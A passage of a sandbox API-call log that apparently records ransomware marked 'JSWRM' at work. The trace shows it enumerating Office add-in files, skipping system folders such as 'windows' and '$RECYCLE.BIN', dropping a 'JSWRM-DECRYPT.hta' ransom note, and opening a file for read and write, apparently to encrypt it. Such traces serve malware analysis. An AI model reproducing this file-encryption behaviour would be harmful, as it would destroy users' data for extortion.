ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0124.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.188] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40afb139, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.188] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1466e4fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.188] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.189] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40afb139, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40afb139, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40afb139, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.189] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0124.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.190] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa806c3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.190] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0124.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0124.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0124.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0124.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.190] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcc3c8ab, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc3c8ab, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.190] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.190] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0124.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.191] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.191] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.192] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1428e945, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x142b4b24, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51e14, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hi.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2=".") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="..") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="...") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="windows") returned -1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="recovery") returned -1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="perflogs") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="documents and settings") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="system volume information") returned -1 [0124.192] lstrcmpiW (lpString1="PowerViewRes.hi.xap", lpString2="msocache") returned 1 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hi.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hi.xap", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hi.xap", lpUsedDefaultChar=0x0) returned 19 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hi.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hi.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hi.xap", lpUsedDefaultChar=0x0) returned 19 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\PowerViewRes.hi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\powerviewres.hi.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.193] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=335380) returned 1 [0124.193] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.193] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.209] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.209] WriteFile (in: hFile=0x338, 